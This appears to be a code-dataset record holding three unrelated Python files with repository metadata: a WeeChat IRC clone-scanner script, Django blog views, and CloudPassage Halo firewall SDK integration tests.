| 18.214286 | 40 | 0.717647 | 31 | 255 | 5.612903 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004739 | 0.172549 | 255 | 13 | 41 | 19.615385 | 0.819905 | 0.078431 | 0 | 0 | 0 | 0 | 0.034188 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
77daf6cdbbae093a434d465fa597fa57326476d1 | 21,478 | py | Python | clone_scanner.py | m42e/weechat_scripts | a57af7181c8231d36f9a32d467d134ab4f7d10fd | [
"MIT"
] | null | null | null | clone_scanner.py | m42e/weechat_scripts | a57af7181c8231d36f9a32d467d134ab4f7d10fd | [
"MIT"
] | null | null | null | clone_scanner.py | m42e/weechat_scripts | a57af7181c8231d36f9a32d467d134ab4f7d10fd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Clone Scanner, version 1.3 for WeeChat version 0.3
# Latest development version: https://github.com/FiXato/weechat_scripts
#
# A Clone Scanner that can manually scan channels and
# automatically scans joins for users on the channel
# with multiple nicknames from the same host.
#
# Upon join by a user, the user's host is compared to the infolist of
# already connected users to see if they are already online from
# another nickname. If the user is a clone, it will report it.
# With the '/clone_scanner scan' command you can manually scan a chan.
#
# See /set plugins.var.python.clone_scanner.* for all possible options
# Use the brilliant iset.pl plugin (/weeget install iset) to see what they do
# Or check the sourcecode below.
#
# Example output for an on-join scan result:
# 21:32:46 ▬▬▶ FiXato_Odie (FiXato@FiXato.net) has joined #lounge
# 21:32:46 FiXato_Odie is already on the channel as FiXato!FiXato@FiXato.Net and FiX!FiXaphone@FiXato.net
#
# Example output for a manual scan:
# 21:34:44 fixato.net is online from 3 nicks:
# 21:34:44 - FiXato!FiXato@FiXato.Net
# 21:34:44 - FiX!FiXaphone@FiXato.net
# 21:34:44 - FiXato_Odie!FiXato@FiXato.net
#
## History:
### 2011-09-11: FiXato:
#
# * version 0.1: initial release.
# * Added an on-join clone scan. Any user that joins a channel will be
# matched against users already on the channel.
#
# * version 0.2: manual clone scan
# * Added a manual clone scan via /clone_scanner scan
# you can specify a target channel with:
# /clone_scanner scan #myChannelOnCurrentServer
# or:
# /clone_scanner scan Freenode.#myChanOnSpecifiedNetwork
# * Added completion
#
### 2011-09-12: FiXato:
#
# * version 0.3: Refactor galore
# * Refactored some code. Codebase should be DRYer and clearer now.
# * Manual scan report lists by host instead of nick now.
# * Case-insensitive host-matching
# * Bugfixed the infolist memleak.
# * on-join scanner works again
# * Output examples added to the comments
#
### 2011-09-19
# * version 0.4: Option galore
# * Case-insensitive buffer lookup fix.
# * Made most messages optional through settings.
# * Made on-join alert and clone report key a bit more configurable.
# * Added formatting options for on-join alerts.
# * Added format_message helper method that accepts multiple whitespace-separated weechat.color() options.
# * Added formatting options for join messages
# * Added formatting options for clone reports
# * Added format_from_config helper method that reads the given formatting key from the config
#
# * version 0.5: cs_buffer refactoring
# * dropping the manual cs_create_buffer call in favor for a cs_get_buffer() method
#
### 2012-02-10: FiXato:
#
# * version 0.6: Stop shoving that buffer in my face!
# * The clone_scanner buffer should no longer pop up by itself when you load the script.
# It should only pop up now when you actually a line needs to show up in the buffer.
#
# * version 0.7: .. but please pop it up in my current window when I ask for it
# * Added setting plugins.var.python.clone_scanner.autofocus
# This will autofocus the clone_scanner buffer in the current window if another window isn't
# already showing it, and of course only when the clone_scanner buffer is triggered
#
### 2012-02-10: FiXato:
#
# * version 0.8: .. and only when it is first created..
# * Prevents the buffer from being focused every time there is activity in it and not being shown in a window.
#
### 2012-04-01: FiXato:
#
# * version 0.9: Hurrah for bouncers...
# * Added the option plugins.var.python.clone_scanner.compare_idents
# Set it to 'on' if you don't want people with different idents to be marked as clones.
# Useful on channels with bouncers.
#
### 2012-04-02: FiXato:
#
# * version 1.0: Bugfix
# * Fixed the on-join scanner bug introduced by the 0.9 release.
# I was not properly comparing the new ident@host.name key in all places yet.
# Should really have tested this better ><
#
### 2012-04-03: FiXato:
#
# * version 1.1: Stop being so sensitive!
# * Continuing to fix the on-join scanner bugs introduced by the 0.9 release.
# The ident@host.name dict key wasn't being lowercased for comparison in the on-join scan.
#
# * version 1.2: So shameless!
# * Added shameless advertising for my script through /clone_scanner advertise
#
### 2013-04-09: FiXato:
# * version 1.3: Such a killer rabbit
# * Thanks to Curtis Sorensen aka killerrabbit clone_scanner.py now supports:
# * local channels (&-prefixed)
# * nameless channels (just # or &)
#
## Acknowledgements:
# * Sebastien "Flashcode" Helleu, for developing the kick-ass chat/IRC
# client WeeChat
# * ArZa, whose kickban.pl script helped me get started with using the
# infolist results.
# * LayBot, for requesting the ident comparison
# * Curtis "killerrabbit" Sorensen, for sending in two pull-requests,
# adding support for local and nameless channels.
#
## TODO:
# - Add option to enable/disable public clone reporting aka msg channels
# - Add option to enable/disable scanning on certain channels/networks
# - Add cross-channel clone scan
# - Add cross-server clone scan
#
## Copyright (c) 2011-2012 Filip H.F. "FiXato" Slagter,
# <FiXato [at] Gmail [dot] com>
# http://google.com/profiles/FiXato
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
SCRIPT_NAME = "clone_scanner"
SCRIPT_AUTHOR = "Filip H.F. 'FiXato' Slagter <fixato [at] gmail [dot] com>"
SCRIPT_VERSION = "1.3"
SCRIPT_LICENSE = "MIT"
SCRIPT_DESC = "A Clone Scanner that can manually scan channels and automatically scans joins for users on the channel with multiple nicknames from the same host."
SCRIPT_COMMAND = "clone_scanner"
SCRIPT_CLOSE_CB = "cs_close_cb"
import_ok = True
try:
import weechat
except ImportError:
print "This script must be run under WeeChat."
import_ok = False
import re
cs_buffer = None
cs_settings = (
("autofocus", "on", "Focus the clone_scanner buffer in the current window if it isn't already displayed by a window."),
("compare_idents", "off", "Match against ident@host.name instead of just the hostname. Useful if you don't want different people from bouncers marked as clones"),
("display_join_messages", "off", "Display all joins in the clone_scanner buffer"),
("display_onjoin_alert_clone_buffer", "on", "Display an on-join clone alert in the clone_scanner buffer"),
("display_onjoin_alert_target_buffer", "on", "Display an on-join clone alert in the buffer where the clone was detected"),
("display_onjoin_alert_current_buffer", "off", "Display an on-join clone alert in the current buffer"),
("display_scan_report_clone_buffer", "on", "Display manual scan reports in the clone buffer"),
("display_scan_report_target_buffer", "off", "Display manual scan reports in the buffer of the scanned channel"),
("display_scan_report_current_buffer", "on", "Display manual scan reports in the current buffer"),
("clone_report_key", "mask", "Which 'key' to display in the clone report: 'mask' for full hostmasks, or 'nick' for nicks"),
("clone_onjoin_alert_key", "mask", "Which 'key' to display in the on-join alerts: 'mask' for full hostmasks, or 'nick' for nicks"),
("colors.onjoin_alert.message", "red", "The on-join clone alert's message colour. Formats are space separated."),
("colors.onjoin_alert.nick", "bold red", "The on-join clone alert's nick colour. Formats are space separated. Note: if you have colorize_nicks, this option might not work as expected."),
("colors.onjoin_alert.channel", "red", "The on-join clone alert's channel colour. Formats are space separated."),
("colors.onjoin_alert.matches", "bold red", "The on-join clone alert's matches (masks or nicks) colour. Formats are space separated. Note: if you have colorize_nicks, this option might not work as expected."),
("colors.join_messages.message", "chat", "The base colour for the join messages."),
("colors.join_messages.nick", "bold", "The colour for the 'nick'-part of the join messages. Note: if you have colorize_nicks, this option might not always work as expected."),
("colors.join_messages.identhost", "chat", "The colour for the 'ident@host'-part of the join messages."),
("colors.join_messages.channel", "bold", "The colour for the 'channel'-part of the join messages."),
("colors.clone_report.header.message", "chat", "The colour of the clone report header."),
("colors.clone_report.header.number_of_hosts", "bold", "The colour of the number of hosts in the clone report header."),
("colors.clone_report.header.channel", "bold", "The colour of the channel name in the clone report header."),
("colors.clone_report.subheader.message", "chat", "The colour of the clone report subheader."),
("colors.clone_report.subheader.host", "bold", "The colour of the host in the clone report subheader."),
("colors.clone_report.subheader.number_of_clones", "bold", "The colour of the number of clones in the clone report subheader."),
("colors.clone_report.clone.message", "chat", "The colour of the clone hit in the clone report message."),
("colors.clone_report.clone.match", "chat", "The colour of the match details (masks or nicks) in the clone report."),
("colors.mask.nick", "bold", "The formatting of the nick in the match mask."),
("colors.mask.identhost", "", "The formatting of the identhost in the match mask."),
)
def get_validated_key_from_config(setting):
key = weechat.config_get_plugin(setting)
if key != 'mask' and key != 'nick':
weechat.prnt("", "Key %s not found. Valid settings are 'nick' and 'mask'. Reverted the setting to 'mask'" % key)
weechat.config_set_plugin("clone_report_key", "mask")
key = "mask"
return key
def format_message(msg, formats, reset_color='chat'):
if type(formats) == str:
formats = formats.split()
formatted_message = msg
needs_color_reset = False
for format in formats:
if format in ['bold', 'reverse', 'italic', 'underline']:
end_format = '-%s' % format
else:
needs_color_reset = True
end_format = ""
formatted_message = "%s%s%s" % (weechat.color(format), formatted_message, weechat.color(end_format))
if needs_color_reset:
formatted_message += weechat.color(reset_color)
return formatted_message
def format_from_config(msg, config_option):
return format_message(msg, weechat.config_get_plugin(config_option))
def on_join_scan_cb(data, signal, signal_data):
network = signal.split(',')[0]
joined_nick = weechat.info_get("irc_nick_from_host", signal_data)
join_match_data = re.match(':[^!]+!([^@]+@(\S+)) JOIN :?([#&]\S*)', signal_data)
parsed_ident_host = join_match_data.group(1).lower()
parsed_host = join_match_data.group(2).lower()
if weechat.config_get_plugin("compare_idents") == "on":
hostkey = parsed_ident_host
else:
hostkey = parsed_host
chan_name = join_match_data.group(3)
network_chan_name = "%s.%s" % (network, chan_name)
chan_buffer = weechat.info_get("irc_buffer", "%s,%s" % (network, chan_name))
if not chan_buffer:
print "No IRC channel buffer found for %s" % network_chan_name
return weechat.WEECHAT_RC_OK
if weechat.config_get_plugin("display_join_messages") == "on":
message = "%s%s%s%s%s" % (
format_from_config(joined_nick, "colors.join_messages.nick"),
format_from_config("!", "colors.join_messages.message"),
format_from_config(parsed_ident_host, "colors.join_messages.identhost"),
format_from_config(" JOINed ", "colors.join_messages.message"),
format_from_config(network_chan_name, "colors.join_messages.channel"),
)
#Make sure message format is also applied if no formatting is given for nick
message = format_from_config(message, "colors.join_messages.message")
weechat.prnt(cs_get_buffer(), message)
clones = get_clones_for_buffer("%s,%s" % (network, chan_name), hostkey)
if clones:
key = get_validated_key_from_config("clone_onjoin_alert_key")
filtered_clones = filter(lambda clone: clone['nick'] != joined_nick, clones[hostkey])
match_strings = map(lambda m: format_from_config(m[key], "colors.onjoin_alert.matches"), filtered_clones)
join_string = format_from_config(' and ',"colors.onjoin_alert.message")
masks = join_string.join(match_strings)
message = "%s %s %s %s %s" % (
format_from_config(joined_nick, "colors.onjoin_alert.nick"),
format_from_config("is already on", "colors.onjoin_alert.message"),
format_from_config(network_chan_name, "colors.onjoin_alert.channel"),
format_from_config("as", "colors.onjoin_alert.message"),
masks
)
message = format_from_config(message, weechat.config_get_plugin("colors.onjoin_alert.message"))
if weechat.config_get_plugin("display_onjoin_alert_clone_buffer") == "on":
weechat.prnt(cs_get_buffer(),message)
if weechat.config_get_plugin("display_onjoin_alert_target_buffer") == "on":
weechat.prnt(chan_buffer, message)
if weechat.config_get_plugin("display_onjoin_alert_current_buffer") == "on":
weechat.prnt(weechat.current_buffer(),message)
return weechat.WEECHAT_RC_OK
def cs_get_buffer():
global cs_buffer
if not cs_buffer:
# Sets notify to 0 as this buffer does not need to be in hotlist.
cs_buffer = weechat.buffer_new("clone_scanner", "", \
"", SCRIPT_CLOSE_CB, "")
weechat.buffer_set(cs_buffer, "title", "Clone Scanner")
weechat.buffer_set(cs_buffer, "notify", "0")
weechat.buffer_set(cs_buffer, "nicklist", "0")
if weechat.config_get_plugin("autofocus") == "on":
if not weechat.window_search_with_buffer(cs_buffer):
weechat.command("", "/buffer " + weechat.buffer_get_string(cs_buffer,"name"))
return cs_buffer
def cs_close_cb(*kwargs):
""" A callback for buffer closing. """
global cs_buffer
#TODO: Ensure the clone_scanner buffer gets closed if its option is set and the script unloads
cs_buffer = None
return weechat.WEECHAT_RC_OK
def get_channel_from_buffer_args(buffer, args):
server_name = weechat.buffer_get_string(buffer, "localvar_server")
channel_name = args
if not channel_name:
channel_name = weechat.buffer_get_string(buffer, "localvar_channel")
match_data = re.match('\A(irc.)?([^.]+)\.([#&]\S*)\Z', channel_name)
if match_data:
channel_name = match_data.group(3)
server_name = match_data.group(2)
return server_name, channel_name
def get_clones_for_buffer(infolist_buffer_name, hostname_to_match=None):
matches = {}
infolist = weechat.infolist_get("irc_nick", "", infolist_buffer_name)
while(weechat.infolist_next(infolist)):
ident_hostname = weechat.infolist_string(infolist, "host")
host_matchdata = re.match('([^@]+)@(\S+)', ident_hostname)
if not host_matchdata:
continue
hostname = host_matchdata.group(2).lower()
ident = host_matchdata.group(1).lower()
if weechat.config_get_plugin("compare_idents") == "on":
hostkey = ident_hostname.lower()
else:
hostkey = hostname
if hostname_to_match and hostname_to_match.lower() != hostkey:
continue
nick = weechat.infolist_string(infolist, "name")
matches.setdefault(hostkey,[]).append({
'nick': nick,
'mask': "%s!%s" % (
format_from_config(nick, "colors.mask.nick"),
format_from_config(ident_hostname, "colors.mask.identhost")),
'ident': ident,
'ident_hostname': ident_hostname,
'hostname': hostname,
})
weechat.infolist_free(infolist)
#Select only the results that have more than 1 match for a host
return dict((k, v) for (k, v) in matches.iteritems() if len(v) > 1)
def report_clones(clones, scanned_buffer_name, target_buffer=None):
# Default to clone_scanner buffer
if not target_buffer:
target_buffer = cs_get_buffer()
if clones:
clone_report_header = "%s %s %s%s" % (
format_from_config(len(clones), "colors.clone_report.header.number_of_hosts"),
format_from_config("hosts with clones were found on", "colors.clone_report.header.message"),
format_from_config(scanned_buffer_name, "colors.clone_report.header.channel"),
format_from_config(":", "colors.clone_report.header.message"),
)
clone_report_header = format_from_config(clone_report_header, "colors.clone_report.header.message")
weechat.prnt(target_buffer, clone_report_header)
for (host, clones) in clones.iteritems():
host_message = "%s %s %s %s" % (
format_from_config(host, "colors.clone_report.subheader.host"),
format_from_config("is online from", "colors.clone_report.subheader.message"),
format_from_config(len(clones), "colors.clone_report.subheader.number_of_clones"),
format_from_config("nicks:", "colors.clone_report.subheader.message"),
)
host_message = format_from_config(host_message, "colors.clone_report.subheader.message")
weechat.prnt(target_buffer, host_message)
for user in clones:
key = get_validated_key_from_config("clone_report_key")
clone_message = "%s%s" % (" - ", format_from_config(user[key], "colors.clone_report.clone.match"))
clone_message = format_from_config(clone_message,"colors.clone_report.clone.message")
weechat.prnt(target_buffer, clone_message)
else:
weechat.prnt(target_buffer, "No clones found on %s" % scanned_buffer_name)
def cs_command_main(data, buffer, args):
if args[0:4] == 'scan':
server_name, channel_name = get_channel_from_buffer_args(buffer, args[5:])
clones = get_clones_for_buffer('%s,%s' % (server_name, channel_name))
if weechat.config_get_plugin("display_scan_report_target_buffer") == "on":
target_buffer = weechat.info_get("irc_buffer", "%s,%s" % (server_name, channel_name))
report_clones(clones, '%s.%s' % (server_name, channel_name), target_buffer)
if weechat.config_get_plugin("display_scan_report_clone_buffer") == "on":
report_clones(clones, '%s.%s' % (server_name, channel_name))
if weechat.config_get_plugin("display_scan_report_current_buffer") == "on":
report_clones(clones, '%s.%s' % (server_name, channel_name), weechat.current_buffer())
elif args[0:9] == 'advertise':
weechat.command("", "/input insert /me is using FiXato's CloneScanner v%s for WeeChat. Get the latest version from: https://github.com/FiXato/weechat_scripts/blob/master/clone_scanner.py" % SCRIPT_VERSION)
return weechat.WEECHAT_RC_OK
def cs_set_default_settings():
global cs_settings
# Set default settings
for option, default_value, description in cs_settings:
if not weechat.config_is_set_plugin(option):
weechat.config_set_plugin(option, default_value)
version = weechat.info_get("version_number", "") or 0
if int(version) >= 0x00030500:
weechat.config_set_desc_plugin(option, description)
if __name__ == "__main__" and import_ok:
if weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,
SCRIPT_LICENSE, SCRIPT_DESC, SCRIPT_CLOSE_CB, ""):
cs_set_default_settings()
cs_buffer = weechat.buffer_search("python", "clone_scanner")
weechat.hook_signal("*,irc_in2_join", "on_join_scan_cb", "")
weechat.hook_command(SCRIPT_COMMAND,
SCRIPT_DESC,
"[scan] [[plugin.][network.]channel] | [advertise] | [help]",
"the target_buffer can be: \n"
"- left out, so the current channel buffer will be scanned.\n"
"- a plain channel name, such as #weechat, in which case it will prefixed with the current network name\n"
"- a channel name prefixed with network name, such as Freenode.#weechat\n"
"- a channel name prefixed with plugin and network name, such as irc.freenode.#weechat\n"
"See /set plugins.var.python.clone_scanner.* for all possible configuration options",
" || scan %(buffers_names)"
" || advertise"
" || help",
"cs_command_main", "")
| 47.941964 | 213 | 0.70365 | 3,034 | 21,478 | 4.802241 | 0.182597 | 0.027934 | 0.031846 | 0.019629 | 0.343102 | 0.26081 | 0.21407 | 0.173095 | 0.096156 | 0.084351 | 0 | 0.010484 | 0.187308 | 21,478 | 447 | 214 | 48.049217 | 0.824062 | 0.304684 | 0 | 0.091286 | 0 | 0.041494 | 0.398817 | 0.13167 | 0 | 0 | 0.00068 | 0.002237 | 0 | 0 | null | null | 0 | 0.024896 | null | null | 0.008299 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77deb2cb383c89730b57c57b1815e7a78a3a5a29 | 2,034 | py | Python | blog/views.py | KoukiNAGATA/kouchan-blog | 51808388135eca32077ad05241a0587df0e08c25 | [
"MIT"
] | null | null | null | blog/views.py | KoukiNAGATA/kouchan-blog | 51808388135eca32077ad05241a0587df0e08c25 | [
"MIT"
] | 20 | 2021-08-02T13:18:22.000Z | 2021-09-25T04:32:55.000Z | blog/views.py | KoukiNAGATA/kouchan-blog | 51808388135eca32077ad05241a0587df0e08c25 | [
"MIT"
] | null | null | null | from django.views.generic import DetailView, ListView
from blog.models import Post
class CommonListView(ListView):
"""ListViewのテンプレート"""
model = Post
template_name = "post_list.html"
paginate_by = 10
def get_context_data(self, **kw):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kw)
context['posts_all'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
return context
class PostListView(CommonListView):
def get_context_data(self, **kw):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
context['title'] = "TOP"
return context
class BlogListView(CommonListView):
def get_context_data(self, **kw):
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').filter(category__name='Blog')
context['title'] = "Blog"
return context
class NewsListView(CommonListView):
def get_context_data(self, **kw):
context = super().get_context_data(**kw)
context['posts'] = Post.objects.order_by(
'-created_at').filter(category__name='News')
context['title'] = "News"
return context
class PostDetailView(DetailView):
model = Post
pk_url_kwarg = "post_id"
template_name = "post_detail.html"
# postはこちらで持っておく
context_object_name = "post"
def get_context_data(self, **kwargs):
# 下書き以外で最新の10件を表示
context = super().get_context_data(**kwargs)
context['posts_all'] = Post.objects.order_by(
'-created_at').exclude(category__name='Draft')
return context
class AboutView(CommonListView):
model = Post
template_name = "about.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = "About"
return context
| 29.057143 | 58 | 0.642085 | 225 | 2,034 | 5.551111 | 0.253333 | 0.096077 | 0.134508 | 0.081665 | 0.609287 | 0.609287 | 0.554043 | 0.485989 | 0.485989 | 0.485989 | 0 | 0.005122 | 0.232055 | 2,034 | 69 | 59 | 29.478261 | 0.794494 | 0.03884 | 0 | 0.591837 | 0 | 0 | 0.101747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122449 | false | 0 | 0.040816 | 0 | 0.591837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
77e210d5c22c033bb15b659ea78d152f86e934fa | 10,692 | py | Python | tests/integration/test_integration_firewall_policy.py | joshuaguite/cloudpassage-halo-python-sdk | ab8775377c9e99ed89d335ee44a92553fce49eb7 | [
"BSD-3-Clause"
] | 8 | 2016-10-24T12:37:32.000Z | 2019-06-01T10:00:18.000Z | tests/integration/test_integration_firewall_policy.py | joshuaguite/cloudpassage-halo-python-sdk | ab8775377c9e99ed89d335ee44a92553fce49eb7 | [
"BSD-3-Clause"
] | 109 | 2016-08-09T04:51:48.000Z | 2020-02-11T02:33:35.000Z | tests/integration/test_integration_firewall_policy.py | joshuaguite/cloudpassage-halo-python-sdk | ab8775377c9e99ed89d335ee44a92553fce49eb7 | [
"BSD-3-Clause"
] | 14 | 2016-01-23T00:10:30.000Z | 2021-07-07T21:13:56.000Z | import cloudpassage
import json
import os
policy_file_name = "firewall.json"
config_file_name = "portal.yaml.local"
tests_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))
config_file = os.path.join(tests_dir, "configs/", config_file_name)
policy_file = os.path.join(tests_dir, 'policies/', policy_file_name)
session_info = cloudpassage.ApiKeyManager(config_file=config_file)
key_id = session_info.key_id
secret_key = session_info.secret_key
api_hostname = session_info.api_hostname
api_port = session_info.api_port
with open(policy_file, 'r') as p_file:
firewall_policy_body = p_file.read().replace('\n', '')
def create_firewall_policy_object():
session = cloudpassage.HaloSession(key_id, secret_key,
api_host=api_hostname,
api_port=api_port,
integration_string="SDK-Smoke")
firewall_policy_object = cloudpassage.FirewallPolicy(session)
return firewall_policy_object
def create_firewall_rule_object():
session = cloudpassage.HaloSession(key_id, secret_key,
api_host=api_hostname,
api_port=api_port,
integration_string="SDK-Smoke")
firewall_rule_object = cloudpassage.FirewallRule(session)
return firewall_rule_object
def create_firewall_zone_object():
session = cloudpassage.HaloSession(key_id, secret_key,
api_host=api_hostname,
api_port=api_port,
integration_string="SDK-Smoke")
firewall_zone_object = cloudpassage.FirewallZone(session)
return firewall_zone_object
def create_firewall_service_object():
session = cloudpassage.HaloSession(key_id, secret_key,
api_host=api_hostname,
api_port=api_port,
integration_string="SDK-Smoke")
firewall_service_object = cloudpassage.FirewallService(session)
return firewall_service_object
def create_firewall_interface_object():
session = cloudpassage.HaloSession(key_id, secret_key,
api_host=api_hostname,
api_port=api_port,
integration_string="SDK-Smoke")
firewall_interface_object = cloudpassage.FirewallInterface(session)
return firewall_interface_object
def get_target_linux_firewall_policy():
firewall_policy = create_firewall_policy_object()
policy_list = firewall_policy.list_all()
for policy in policy_list:
if policy["platform"] == 'linux':
return policy["id"]
return None
def remove_policy_by_name(policy_name):
fw_policy_obj = create_firewall_policy_object()
policy_list = fw_policy_obj.list_all()
for policy in policy_list:
if policy["name"] == policy_name:
fw_policy_obj.delete(policy["id"])
class TestIntegrationFirewallPolicy:
def test_instantiation(self):
session = cloudpassage.HaloSession(key_id, secret_key)
assert cloudpassage.FirewallPolicy(session)
def test_firewall_policy_list_all(self):
"""This test requires that a firewall policy exist in your Halo
account. If you don't have a firewall policy in your Halo account,
this test will fail.
"""
firewall_policy = create_firewall_policy_object()
firewall_policy_list = firewall_policy.list_all()
assert "id" in firewall_policy_list[0]
def test_firewall_policy_describe(self):
"""This test requires that a firewall policy exist in your Halo
account. If you don't have a firewall policy in your Halo account,
this test will fail.
"""
firewall_policy = create_firewall_policy_object()
firewall_policy_list = firewall_policy.list_all()
target_firewall_policy_id = firewall_policy_list[0]["id"]
target_policy = firewall_policy.describe(target_firewall_policy_id)
assert "id" in target_policy
def test_firewall_policy_create_update_delete(self):
firewall_policy = create_firewall_policy_object()
remove_policy_by_name("cpapi_test_1")
remove_policy_by_name("NewName")
this_policy = json.loads(firewall_policy_body)
this_policy["firewall_policy"]["name"] = "cpapi_test_1"
new_policy_id = firewall_policy.create(json.dumps(this_policy))
policy_update = {"firewall_policy": {"name": "NewName",
"id": new_policy_id}}
firewall_policy.update(policy_update)
delete_error = firewall_policy.delete(new_policy_id)
assert delete_error is None
class TestIntegrationFirewallRule:
def test_instantiation(self):
session = cloudpassage.HaloSession(key_id, secret_key)
assert cloudpassage.FirewallRule(session)
def test_list_firewall_policy_rules(self):
firewall_rule = create_firewall_rule_object()
target_firewall_policy_id = get_target_linux_firewall_policy()
policy_rules = firewall_rule.list_all(target_firewall_policy_id)
assert "id" in policy_rules[0]
def test_get_firewall_policy_rule_describe(self):
firewall_rule = create_firewall_rule_object()
target_firewall_policy_id = get_target_linux_firewall_policy()
policy_rules = firewall_rule.list_all(target_firewall_policy_id)
target_rule_id = policy_rules[0]["id"]
rule_details = firewall_rule.describe(target_firewall_policy_id,
target_rule_id)
assert "id" in rule_details
def test_firewall_policy_rule_create_mod_delete(self):
modification_body = {"firewall_rule": {
"comment": "Your momma makes firewall rules"}}
firewall_policy = create_firewall_policy_object()
remove_policy_by_name("cpapi_test_2")
firewall_rule = create_firewall_rule_object()
this_policy = json.loads(firewall_policy_body)
this_policy["firewall_policy"]["name"] = "cpapi_test_2"
target_policy_id = firewall_policy.create(json.dumps(this_policy))
rule_imported = firewall_rule.list_all(target_policy_id)[0]
del rule_imported["url"]
rule_imported["position"] = 1
rule_body = {"firewall_rule": rule_imported}
print(rule_body)
target_rule_id = firewall_rule.create(target_policy_id, rule_body)
modification_error = firewall_rule.update(target_policy_id,
target_rule_id,
modification_body)
delete_rule_error = firewall_rule.delete(target_policy_id,
target_rule_id)
delete_policy_error = firewall_policy.delete(target_policy_id)
assert modification_error is None
assert delete_rule_error is None
assert delete_policy_error is None
class TestIntegraationFirewallZone:
def test_instantiation(self):
session = cloudpassage.HaloSession(key_id, secret_key)
assert cloudpassage.FirewallZone(session)
def test_list_all_ip_zones(self):
firewall_zone = create_firewall_zone_object()
list_of_zones = firewall_zone.list_all()
assert "id" in list_of_zones[0]
def test_get_zone_details(self):
firewall_zone = create_firewall_zone_object()
target_zone_id = firewall_zone.list_all()[0]["id"]
details = firewall_zone.describe(target_zone_id)
assert "id" in details
def test_firewall_zone_create_update_delete(self):
firewall_zone = create_firewall_zone_object()
firewall_zone_body = {"firewall_zone": {"name": "CPAPI TEST",
"ip_address": "127.0.0.1"}}
target_zone_id = firewall_zone.create(firewall_zone_body)
zone_update = {"firewall_zone": {"name": "NewName",
"id": target_zone_id}}
firewall_zone.update(zone_update)
delete_error = firewall_zone.delete(target_zone_id)
assert delete_error is None
class TestIntegrationFirewallService:
def test_instantiation(self):
session = cloudpassage.HaloSession(key_id, secret_key)
assert cloudpassage.FirewallService(session)
def test_list_all_services(self):
firewall_service = create_firewall_service_object()
list_of_services = firewall_service.list_all()
assert "id" in list_of_services[0]
def test_get_service_details(self):
firewall_service = create_firewall_service_object()
target_service_id = firewall_service.list_all()[0]["id"]
details = firewall_service.describe(target_service_id)
assert "id" in details
def test_firewall_zone_create_update_delete(self):
firewall_service = create_firewall_service_object()
firewall_service_body = {"firewall_service": {"name": "CPAPI TEST",
"protocol": "TCP",
"port": "1234"}}
target_service_id = firewall_service.create(firewall_service_body)
service_update = {"firewall_service": {"name": "NewName",
"id": target_service_id}}
firewall_service.update(service_update)
delete_error = firewall_service.delete(target_service_id)
assert delete_error is None
class TestIntegrationFirewallInterface:
def test_instantiation(self):
session = cloudpassage.HaloSession(key_id, secret_key)
assert cloudpassage.FirewallInterface(session)
def test_list_all_interfaces(self):
interface = create_firewall_interface_object()
list_of_interfaces = interface.list_all()
assert "id" in list_of_interfaces[0]
def test_get_interface_details(self):
interface = create_firewall_interface_object()
target_interface_id = interface.list_all()[0]["id"]
details = interface.describe(target_interface_id)
assert "id" in details
def test_firewall_interface_create_delete(self):
interface = create_firewall_interface_object()
interface_body = {"firewall_interface": {"name": "eth12"}}
target_interface_id = interface.create(interface_body)
delete_error = interface.delete(target_interface_id)
assert delete_error is None
